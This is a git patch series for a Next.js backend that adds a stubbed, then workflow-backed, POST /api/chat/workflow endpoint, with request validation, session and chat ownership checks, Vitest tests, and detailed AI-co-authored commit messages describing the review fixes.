From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 09:24:00 -0500
Subject: [PATCH 01/10] feat(chat-workflow): POST /api/chat/workflow route stub
 (PR 2 of 5) (#579)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f650) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/api/chat/workflow/route.ts                |  34 ++++
 .../handleChatWorkflowStream.test.ts          | 165 ++++++++++++++++++
 .../__tests__/validateChatWorkflow.test.ts    | 142 +++++++++++++++
 lib/chat/handleChatWorkflowStream.ts          |  61 +++++++
 lib/chat/validateChatWorkflow.ts              |  61 +++++++
 5 files changed, 463 insertions(+)
 create mode 100644 app/api/chat/workflow/route.ts
 create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts
 create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts
 create mode 100644 lib/chat/handleChatWorkflowStream.ts
 create mode 100644 lib/chat/validateChatWorkflow.ts
diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts
new file mode 100644
index 000000000..19445c03b
--- /dev/null
+++ b/app/api/chat/workflow/route.ts
@@ -0,0 +1,34 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+
+export const maxDuration = 800;
+
+/**
+ * OPTIONS handler for CORS preflight requests.
+ *
+ * @returns A NextResponse with CORS headers.
+ */
+export async function OPTIONS() {
+  return new NextResponse(null, {
+    status: 200,
+    headers: getCorsHeaders(),
+  });
+}
+
+/**
+ * POST /api/chat/workflow
+ *
+ * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing
+ * session + chat. Currently returns a hardcoded UIMessage stream stub —
+ * the workflow is wired up in a follow-up PR.
+ *
+ * Contract: https://developers.recoupable.com/api-reference/chat/workflow
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function POST(request: NextRequest): Promise<Response> {
+  return handleChatWorkflowStream(request);
+}
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
new file mode 100644
index 000000000..c61911be8
--- /dev/null
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -0,0 +1,165 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({
+  validateChatWorkflow: vi.fn(),
+}));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
+  selectSessions: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({
+  selectChats: vi.fn(),
+}));
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({
+  isSandboxActive: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+
+function makeRequest(): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "test-key", "content-type": "application/json" },
+    body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }),
+  });
+}
+
+function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+  vi.mocked(validateChatWorkflow).mockResolvedValue({
+    messages: [],
+    chatId: CHAT_ID,
+    sessionId: SESSION_ID,
+    accountId: overrides.accountId ?? ACCOUNT_ID,
+    orgId: null,
+    authToken: "test-key",
+  });
+}
+
+function mockOwnedSessionWithActiveSandbox() {
+  mockValidatedRequest();
+  vi.mocked(selectSessions).mockResolvedValue([
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+  ]);
+  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
+  vi.mocked(isSandboxActive).mockReturnValue(true);
+}
+
+describe("handleChatWorkflowStream (stub)", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  describe("validation short-circuits", () => {
+    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(401);
+    });
+
+    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
+      const badBody = NextResponse.json(
+        { status: "error", error: "Invalid JSON body" },
+        { status: 400 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+    });
+  });
+
+  describe("session / chat ownership", () => {
+    beforeEach(() => mockValidatedRequest());
+
+    it("returns 404 when the session does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 500 when selectSessions errors (returns null)", async () => {
+      vi.mocked(selectSessions).mockResolvedValue(null);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+    });
+
+    it("returns 403 when the session is owned by a different account", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(403);
+    });
+
+    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(false);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+      const body = await res.json();
+      expect(body.error).toMatch(/sandbox/i);
+    });
+
+    it("returns 404 when the chat does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 404 when chat exists but belongs to a different session", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([
+        { id: CHAT_ID, session_id: "different-session" } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+  });
+
+  describe("success (stub response)", () => {
+    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+
+    it("returns 200 with text/event-stream content type", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+    });
+
+    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const runId = res.headers.get("x-workflow-run-id");
+      expect(runId).toBeTruthy();
+      expect(runId!.startsWith("stub-")).toBe(true);
+    });
+
+    it("emits a stream body that includes the stub assistant text", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const text = await res.text();
+      expect(text).toContain("Hello from /api/chat/workflow");
+    });
+  });
+});
diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts
new file mode 100644
index 000000000..8eb9457c2
--- /dev/null
+++ b/lib/chat/__tests__/validateChatWorkflow.test.ts
@@ -0,0 +1,142 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+
+vi.mock("@/lib/auth/validateAuthContext", () => ({
+  validateAuthContext: vi.fn(),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+
+const validBody = {
+  messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }],
+  chatId: CHAT_ID,
+  sessionId: SESSION_ID,
+};
+
+function makeRequest(body: unknown = validBody): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "k", "content-type": "application/json" },
+    body: typeof body === "string" ? body : JSON.stringify(body),
+  });
+}
+
+function mockAuthOk() {
+  vi.mocked(validateAuthContext).mockResolvedValue({
+    accountId: ACCOUNT_ID,
+    orgId: null,
+    authToken: "k",
+  });
+}
+
+describe("validateChatWorkflow", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  describe("valid input", () => {
+    beforeEach(() => mockAuthOk());
+
+    it("returns the validated body augmented with accountId / orgId / authToken", async () => {
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.chatId).toBe(CHAT_ID);
+      expect(result.sessionId).toBe(SESSION_ID);
+      expect(result.messages).toEqual(validBody.messages);
+      expect(result.accountId).toBe(ACCOUNT_ID);
+      expect(result.orgId).toBe(null);
+      expect(result.authToken).toBe("k");
+    });
+
+    it("accepts an optional context.contextLimit integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: 50 } }),
+      );
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.context?.contextLimit).toBe(50);
+    });
+
+    it("accepts an empty messages array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] }));
+      expect(result).not.toBeInstanceOf(NextResponse);
+    });
+  });
+
+  describe("invalid body", () => {
+    it("returns 400 when JSON is malformed", async () => {
+      const req = new NextRequest("http://localhost/api/chat/workflow", {
+        method: "POST",
+        headers: { "x-api-key": "k", "content-type": "application/json" },
+        body: "{not-json",
+      });
+      const result = await validateChatWorkflow(req);
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is missing", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when sessionId is missing", async () => {
+      const { sessionId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when messages is not an array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is empty string", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when context.contextLimit is not an integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: "fifty" } }),
+      );
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("does not call validateAuthContext when body validation fails", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      await validateChatWorkflow(makeRequest(rest));
+      expect(validateAuthContext).not.toHaveBeenCalled();
+    });
+  });
+
+  describe("auth", () => {
+    it("returns the auth short-circuit response when validateAuthContext rejects", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateAuthContext).mockResolvedValue(authError);
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(401);
+    });
+  });
+});
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
new file mode 100644
index 000000000..137f699cb
--- /dev/null
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -0,0 +1,61 @@
+import { NextRequest, NextResponse } from "next/server";
+import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import generateUUID from "@/lib/uuid/generateUUID";
+
+/**
+ * Handles POST /api/chat/workflow.
+ *
+ * Stub implementation: delegates auth + body validation to validateChatWorkflow,
+ * verifies ownership of the referenced session + chat, confirms the session's
+ * sandbox is active, then returns a hardcoded UIMessage stream with an
+ * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
+ * the agent loop is wired up in a follow-up PR — this stub exists so clients
+ * can integrate against the contract documented at
+ * /api-reference/chat/workflow.
+ *
+ * @param request - The incoming NextRequest
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
+  const validated = await validateChatWorkflow(request);
+  if (validated instanceof NextResponse) return validated;
+
+  const sessions = await selectSessions({ id: validated.sessionId });
+  if (sessions === null) return errorResponse("Internal server error", 500);
+  const session = sessions[0];
+  if (!session) return errorResponse("Session not found", 404);
+  if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
+  if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
+
+  const chats = await selectChats({ id: validated.chatId });
+  const chat = chats[0];
+  if (!chat || chat.session_id !== validated.sessionId) {
+    return errorResponse("Chat not found", 404);
+  }
+
+  const runId = `stub-${generateUUID()}`;
+
+  const stream = createUIMessageStream({
+    generateId: generateUUID,
+    execute: ({ writer }) => {
+      const id = generateUUID();
+      writer.write({ type: "text-start", id });
+      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
+      writer.write({ type: "text-end", id });
+    },
+  });
+
+  return createUIMessageStreamResponse({
+    stream,
+    headers: {
+      ...getCorsHeaders(),
+      "x-workflow-run-id": runId,
+    },
+  });
+}
diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts
new file mode 100644
index 000000000..4fd8e6c66
--- /dev/null
+++ b/lib/chat/validateChatWorkflow.ts
@@ -0,0 +1,61 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { z } from "zod";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { validationErrorResponse } from "@/lib/zod/validationErrorResponse";
+
+export const chatWorkflowBodySchema = z.object({
+  messages: z.array(z.any()),
+  chatId: z.string().min(1, "chatId is required"),
+  sessionId: z.string().min(1, "sessionId is required"),
+  context: z
+    .object({
+      contextLimit: z.number().int("contextLimit must be an integer"),
+    })
+    .optional(),
+});
+
+export type ChatWorkflowBody = z.infer<typeof chatWorkflowBodySchema>;
+
+export type ChatWorkflowRequest = ChatWorkflowBody & {
+  accountId: string;
+  orgId: string | null;
+  authToken?: string;
+};
+
+/**
+ * Validates a POST /api/chat/workflow request. Order matters: the JSON body is
+ * parsed and schema-checked first (400 on failure); validateAuthContext runs
+ * only once the body passes, and its error response is returned unchanged.
+ * On success, returns the typed body plus the caller's accountId / orgId / token.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A NextResponse error or the validated, auth-augmented request.
+ */
+export async function validateChatWorkflow(
+  request: NextRequest,
+): Promise<NextResponse | ChatWorkflowRequest> {
+  let rawBody: unknown;
+  try {
+    rawBody = await request.json();
+  } catch {
+    return errorResponse("Invalid JSON body", 400);
+  }
+
+  const parsed = chatWorkflowBodySchema.safeParse(rawBody);
+  if (!parsed.success) {
+    const firstError = parsed.error.issues[0];
+    return validationErrorResponse(firstError.message, firstError.path);
+  }
+
+  const auth = await validateAuthContext(request);
+  if (auth instanceof NextResponse) return auth;
+
+  return {
+    ...parsed.data,
+    accountId: auth.accountId,
+    orgId: auth.orgId,
+    authToken: auth.authToken,
+  };
+}

From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 12:07:35 -0500
Subject: [PATCH 02/10] feat(chat-workflow): wire POST /api/chat/workflow to
 durable Vercel Workflow (PR 3 of 4) (#581)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream from PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  55 ++++
 app/lib/workflows/runAgentWorkflow.ts         |  56 ++++
 .../compareAndSetChatActiveStreamId.test.ts   |  51 +++
 .../handleChatWorkflowStream.test.ts          | 301 ++++++++++++++----
 .../__tests__/maybeResumeChatStream.test.ts   |  46 +++
 .../persistLatestUserMessage.test.ts          | 129 ++++++++
 .../reconcileExistingActiveStream.test.ts     |  92 ++++++
 lib/chat/agentCustomInstructions.ts           |   9 +
 lib/chat/assistantFileLinks.ts                |  28 ++
 lib/chat/compareAndSetChatActiveStreamId.ts   |  49 +++
 lib/chat/handleChatWorkflowStream.ts          | 100 ++++--
 lib/chat/maybeResumeChatStream.ts             |  40 +++
 lib/chat/persistLatestUserMessage.ts          |  84 +++++
 lib/chat/reconcileExistingActiveStream.ts     |  56 ++++
 lib/chat/recoupApiSkillPrompt.ts              |  11 +
 lib/recoupable/__tests__/extractOrgId.test.ts |  57 ++++
 lib/recoupable/extractOrgId.ts                |  31 ++
 .../__tests__/selectChatMessages.test.ts      |  58 ++++
 .../__tests__/upsertChatMessage.test.ts       |  46 +++
 .../chat_messages/selectChatMessages.ts       |  40 +++
 .../chat_messages/upsertChatMessage.ts        |  37 +++
 .../chats/__tests__/updateChat.test.ts        | 110 +++++++
 lib/supabase/chats/updateChat.ts              |  86 +++++
 23 files changed, 1478 insertions(+), 94 deletions(-)
 create mode 100644 app/lib/workflows/runAgentStep.ts
 create mode 100644 app/lib/workflows/runAgentWorkflow.ts
 create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
 create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts
 create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts
 create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts
 create mode 100644 lib/chat/agentCustomInstructions.ts
 create mode 100644 lib/chat/assistantFileLinks.ts
 create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts
 create mode 100644 lib/chat/maybeResumeChatStream.ts
 create mode 100644 lib/chat/persistLatestUserMessage.ts
 create mode 100644 lib/chat/reconcileExistingActiveStream.ts
 create mode 100644 lib/chat/recoupApiSkillPrompt.ts
 create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts
 create mode 100644 lib/recoupable/extractOrgId.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
 create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts
 create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts
